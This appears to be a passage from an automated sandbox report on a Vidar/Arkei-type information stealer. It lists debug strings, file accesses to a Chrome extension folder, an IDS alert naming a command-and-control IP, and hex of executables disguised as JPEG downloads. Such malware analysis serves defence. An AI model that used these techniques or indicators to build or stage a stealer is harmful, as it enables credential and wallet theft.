Source: Binary string: fltLib.pdbS source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: vcruntime140.i386.pdbGCTL source: svchoste.exe, 00000004.00000003.312315900.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.312994791.0000000003827000.00000004.00000001.sdmp, vcruntime140.dll.4.dr
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: kernel32.pdb source: WerFault.exe, 0000001D.00000003.377294930.0000026D6FDD6000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.378691254.0000026D6FDD6000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source: Binary string: msvcp140.i386.pdb source: svchoste.exe, 00000004.00000003.306645593.000000000389F000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.307329985.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.306386681.0000000003821000.00000004.00000001.sdmp, msvcp140.dll.4.dr
Source: Binary string: win32u.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: vaultcli.pdb] source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb0 source: WerFault.exe, 0000001D.00000003.379211829.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.376916862.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.377268412.0000026D6E058000.00000004.00000001.sdmp
Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source: Binary string: imm32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdb= source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb| source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mswsock.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: shell32.pdbl source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: profapi.pdbj source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: tion.ni.pdb source: WerFault.exe, 0000001D.00000003.387077452.0000026D7084E000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387228013.0000026D70850000.00000004.00000001.sdmp
Source: Binary string: UxTheme.pdbH source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: ncrypt.pdbv source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mswsock.pdb& source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: imm32.pdbB source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: DotNetZip.dll.8.dr
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: System.Management.pdbDD source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: System.Management.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: nsi.pdbK_ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp
Source: Binary string: System.Management.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb`g source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source: Binary string: kernel32.pdb0 source: WerFault.exe, 0000001D.00000003.377294930.0000026D6FDD6000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.378691254.0000026D6FDD6000.00000004.00000001.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wbemprox.pdbT source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: rpcrt4.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: _.pdb source: chormuimii.exe, 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, chormuimii.exe, 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, chormuimii.exe, 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr
Source: Binary string: version.pdbx source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: shcore.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER5768.tmp.dmp.29.dr
Source: Binary string: ws2_32.pdb! source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, freebl3.dll.4.dr
Source: Binary string: oleaut32.pdbA source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: chormuim.exe, 00000008.00000003.350741840.000000001B717000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc6.pdb; source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: nlaapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: lib.pdb.0 source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Drawing.pdb source: WER5768.tmp.dmp.29.dr
Source: Binary string: gdi32full.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mscorlib.ni.pdb0 source: WerFault.exe, 0000001D.00000003.376804497.0000026D6FE62000.00000004.00000001.sdmp
Source: Binary string: ntasn1.pdbn source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: fwpuclnt.pdb, source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: msctf.pdbF source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: msvcr120_clr0400.amd64.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: WLDP.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER5768.tmp.dmp.29.dr
Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: rasman.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wbemcomn.pdbi source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386864637.0000026D7084C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387077452.0000026D7084E000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387228013.0000026D70850000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: WMINet_Utils.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: cfgmgr32.pdbP source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: ntdll.pdb source: WerFault.exe, 0000001D.00000003.379211829.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.376916862.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.377268412.0000026D6E058000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, mozglue.dll.4.dr
Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdbY source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: nlaapi.pdbJ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wbemprox.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: edputil.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B743DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson, 4_2_00B743DF
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B90540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose, 4_2_00B90540
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00B8E640
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00B8D360
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8F6B0 FindFirstFileExW, 4_2_00B8F6B0

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4x nop then add esp, 04h 4_2_00B93050

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.3:49743 -> 108.167.165.140:80
Downloads files with wrong headers with respect to MIME Content-Type
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:21 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Thu, 06 Jun 2019 09:01:52 GMT Accept-Ranges: bytes Content-Length: 144848 Keep-Alive: timeout=5, max=75 Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:22 GMT Server: Apache Last-Modified: Mon, 07 Aug 2017 00:52:20 GMT Accept-Ranges: bytes Content-Length: 645592 Keep-Alive: timeout=5, max=74 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 